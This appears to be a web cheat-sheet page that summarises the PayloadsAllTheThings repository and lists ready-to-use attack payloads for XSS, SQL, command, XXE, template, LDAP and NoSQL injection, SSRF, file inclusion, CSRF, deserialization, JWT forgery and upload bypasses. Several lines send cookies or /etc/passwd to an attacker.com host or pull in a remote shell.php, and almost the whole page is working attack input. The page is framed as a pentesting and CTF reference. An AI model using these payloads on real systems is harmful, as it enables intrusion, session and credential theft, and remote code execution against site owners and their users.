PayloadsAllTheThings
PayloadsAllTheThings is a massive community-maintained GitHub repository containing attack payloads, security bypasses, and exploitation techniques organized by vulnerability type. Essential reference for pentesting, CTF challenges, and web application security research.
Repository Structure
Seção intitulada “Repository Structure”| Path | Purpose |
|---|---|
/XSS/ | Cross-site scripting payloads (reflected, stored, DOM) |
/SQL Injection/ | Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) |
/Command Injection/ | OS command execution payloads |
/SSRF/ | Server-side request forgery exploits |
/XXE/ | XML External Entity attack payloads |
/Directory Traversal/ | Path traversal and traversal bypass techniques |
/File Inclusion/ | LFI and RFI exploitation patterns |
/Server Side Template Injection/ | SSTI payloads across frameworks |
/CORS/ | Cross-Origin Resource Sharing misconfigurations |
/CSRF/ | Cross-Site Request Forgery techniques |
/IDOR/ | Insecure Direct Object Reference patterns |
/Deserialization/ | Java, PHP, Python deserialization gadgets |
XSS Payloads
Seção intitulada “XSS Payloads”Reflected XSS
Seção intitulada “Reflected XSS”<!-- Basic alert -->
<script>alert('XSS')</script>
<!-- Attribute context -->
"><script>alert('XSS')</script>
<!-- Event handler -->
<img src=x onerror="alert('XSS')">
<!-- Unicode/encoding bypass -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- SVG context -->
<svg onload="alert('XSS')">Stored XSS
Seção intitulada “Stored XSS”<!-- Image tag with event -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">
<!-- SVG injection -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">
<!-- HTML5 data attribute -->
<div data-x="`>onclick="eval(this.dataset.x)">Click</div>
<!-- Meta redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">DOM XSS
Seção intitulada “DOM XSS”// Vulnerable pattern
document.getElementById('output').innerHTML = userInput;
// Payload (if input is: <img src=x onerror="alert('DOM XSS')">)
// Will execute
// Source → Sink patterns
// eval() injection
eval(userInput); // Payload: alert('XSS')
// setTimeout/setInterval
setTimeout(userInput, 1000); // Payload: alert('XSS')SQL Injection Payloads
Seção intitulada “SQL Injection Payloads”MySQL Injection
Seção intitulada “MySQL Injection”-- Basic union-based
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,database(),3,4-- -
-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -
-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -
-- Time-based blind
' AND SLEEP(5)-- -MSSQL Injection
Seção intitulada “MSSQL Injection”-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,@@version,3,4-- -
-- Extract tables
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -
-- Time-based blind
'; WAITFOR DELAY '00:00:05'-- -PostgreSQL Injection
Seção intitulada “PostgreSQL Injection”-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database
' UNION SELECT 1,current_database(),3,4-- -
-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -
-- Time-based blind
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -SQLite Injection
Seção intitulada “SQLite Injection”-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -
-- Extract columns
' PRAGMA table_info(users);
-- Time-based blind
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2)) LIMIT 1-- -Command Injection Payloads
Seção intitulada “Command Injection Payloads”# Basic command separators
; ls -la
| whoami
|| id
& cat /etc/passwd
&& whoami
# Pipe to bash
command1 | bash
command1 | sh
# Command substitution
$(whoami)
`whoami`
# Environment variable bypass
${IFS}cat${IFS}/etc/passwd
# Glob patterns
cat /etc/passw*
# Null byte injection (older systems)
cat /etc/passwd%00.txtSSRF Payloads
Seção intitulada “SSRF Payloads”# Local file access
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/
# Internal IP ranges
http://10.0.0.1
http://172.16.0.0/12
http://192.168.0.0/16
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
# Bypass filters
http://127.1
http://localhost:80/../../admin
http://0.0.0.0
# Obfuscation
http://127.0.0.1:80/ → http://2130706433/
http://127.0.0.1 → http://0x7f.0x0.0x0.0x1XXE Payloads
Seção intitulada “XXE Payloads”<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>
<!-- Blind XXE with exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY exfil SYSTEM "http://attacker.com/log?data=%xxe;">
]>
<data>&exfil;</data>
<!-- Parameter entity injection -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/log?%file;'>">
%eval;
]>
<!-- DTD external (if not filtered) -->
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">Directory Traversal Payloads
Seção intitulada “Directory Traversal Payloads”# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini
# Encoded bypass
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd (double encoding)
# Null byte injection (older systems)
../../../etc/passwd%00.jpg
# Backslash bypass
..\..\..\etc\passwd
# Overlong UTF-8
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
# URL encoding variations
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdFile Inclusion (LFI/RFI)
Seção intitulada “File Inclusion (LFI/RFI)”Local File Inclusion
Seção intitulada “Local File Inclusion”# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd
# Log poisoning (access logs, error logs)
?page=../../../var/log/apache2/access.log
# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input (POST data execution)
?file=data:text/plain,<?php phpinfo(); ?>
# Expect wrapper
?file=expect://whoamiRemote File Inclusion
Seção intitulada “Remote File Inclusion”# Basic RFI
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt
# Protocol smuggling
?file=http://attacker.com/payload.php%00
# FTP protocol
?file=ftp://attacker.com/shell.phpSSTI Payloads
Seção intitulada “SSTI Payloads”{{ 7 * 7 }} # Math evaluation
{{ config }} # Access config
{{ self.__dict__ }} # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }} # RCE chain
{{ self._TemplateReference__context }}{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec")}}
{{ _self.env.getFilter("system")("id") }}ERB (Ruby)
Seção intitulada “ERB (Ruby)”<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>Velocity
Seção intitulada “Velocity”#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($proc=$rt.getRuntime().exec('id'))CORS Misconfiguration
Seção intitulada “CORS Misconfiguration”// Vulnerable backend reflects Origin header
Access-Control-Allow-Origin: *
// Or
Access-Control-Allow-Origin: [user-supplied]
// Exploit patterns
// 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true // Invalid combo
// 2. Null origin bypass
Access-Control-Allow-Origin: null
// 3. Subdomain bypass
Origin: attacker.victim.com
// Server accepts: *.victim.com
// 4. Regex bypass
Origin: victim.com.attacker.com
// Server regex: victim.comCSRF Payloads
Seção intitulada “CSRF Payloads”<!-- Image tag (GET request) -->
<img src="http://target.com/admin/delete?id=1">
<!-- Form submission (POST) -->
<form action="http://target.com/admin/delete" method="POST">
<input type="hidden" name="id" value="1">
<input type="submit">
</form>
<script>document.forms[0].submit();</script>
<!-- Fetch request -->
<script>
fetch('http://target.com/admin/delete', {
method: 'POST',
credentials: 'include',
body: 'id=1'
});
</script>
<!-- XMLHttpRequest -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>IDOR (Insecure Direct Object Reference)
Seção intitulada “IDOR (Insecure Direct Object Reference)”# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3
# Parameter manipulation
/profile?id=100 → /profile?id=101, 102, 103...
# Hash/token prediction
/invoice?token=abc123 → /invoice?token=abc124...
# UUID/GUID patterns
/documents/550e8400-e29b-41d4-a716-446655440000
# Increment least significant digits
# Encoded ID manipulation
/user?id=MQ%3D%3D (base64: MQ== = 1)
# Try MQ%3D%3D, Mi%3D%3D, Mw%3D%3D...
# Horizontal escalation
/api/orders/my-orders (returns user 1's orders)
# Bypass: /api/orders/other-user-id/ordersDeserialization Attacks
Seção intitulada “Deserialization Attacks”Java (ysoserial gadgets)
Seção intitulada “Java (ysoserial gadgets)”# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections5 'command' | base64
# Common gadget chains
CommonsCollections
CommonsCollections5
CommonsCollections6
Spring1
Spring2
JRMP
JMXBean// Vulnerable pattern
unserialize($_GET['data']);
// Gadget-based RCE
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}
// Magic method exploitation
__wakeup()
__destruct()
__toString()
__get()
__set()Python Pickle
Seção intitulada “Python Pickle”# Vulnerable
pickle.loads(user_data)
# RCE gadget
import pickle, subprocess
payload = pickle.dumps(subprocess.Popen(['id']))JWT Attacks
Seção intitulada “JWT Attacks”// 1. Algorithm confusion (none algorithm)
// Modify header: {"alg":"none","typ":"JWT"}
// Signature: empty
// 2. Weak signature
// Crack with: hashcat, john, jwt-cracker
// 3. Public key injection
// If server uses asymmetric, swap with public key
// 4. Key confusion
// Modify alg from RS256 to HS256, use public cert as HMAC key
// 5. Expired token bypass
// Modify exp claim
// Example modified JWT
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.Upload Bypass Techniques
Seção intitulada “Upload Bypass Techniques”# Extension bypass
file.php → file.php.jpg
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml
# MIME type bypass
Actual file: PHP shell
MIME header: image/jpeg
# Double extension
file.php.jpg
file.jpg.php
# Null byte injection (older systems)
file.php%00.jpg
# Case variation
file.PhP
file.pHp
# Content-Type header manipulation
Content-Type: image/jpeg (for PHP file)
# Image polyglot
# Valid JPEG + PHP code appendedLDAP Injection
Seção intitulada “LDAP Injection”# Basic LDAP injection
cn=admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(password=*))
# Wildcard bypass
cn=*
uid=*
mail=*
# Blind LDAP injection
cn=admin)(|(uid=*))(&(uid=*)
# Bypass authentication
# Time-based blind
cn=admin)(|(cn=*&(objectclass=*))NoSQL Injection
Seção intitulada “NoSQL Injection”MongoDB
Seção intitulada “MongoDB”// String concatenation injection
db.users.find({username: "' + username + '", password: "' + password + '"})
// Payload: {"$ne": null}
// Query becomes: {username: {$ne: null}, password: {$ne: null}}
// Operator injection
username: {$gt: ""}
password: {$gt: ""}
// JavaScript evaluation
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1
// Aggregation pipeline injection
db.collection.aggregate([{$match: {username: userInput}}])CouchDB
Seção intitulada “CouchDB”// Mango query injection
{"selector": {"username": {"$eq": userInput}}}
// Payload: {"$gt": null}
// Map/reduce injection
_design/users/_view/all?key={"username":"admin"}Open Redirect
Seção intitulada “Open Redirect”# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com
# Whitelist bypass
?redirect=http://legitsite.com.attacker.com
?redirect=http://attacker.com@legitsite.com
?redirect=http://attacker.com#@legitsite.com
?redirect=//attacker.com (protocol-relative URL)
# Unicode/encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com
?redirect=http://attacker.com%00legitsite.com
# JavaScript protocol
?redirect=javascript:alert('XSS')Finding PayloadsAllTheThings
Seção intitulada “Finding PayloadsAllTheThings”- GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
- Regular Updates: Community maintains current bypasses and techniques
- Local Mirror: Clone for offline reference during assessments
- Search: Use repository search to find payloads by vulnerability type
Best Practices
Seção intitulada “Best Practices”- Always test in authorized environments only
- Understand the payload before using it
- Combine techniques for maximum effectiveness
- Keep the repository updated regularly
- Document payloads used in your assessments
- Modify payloads for target-specific contexts
- Validate findings with proper exploitation steps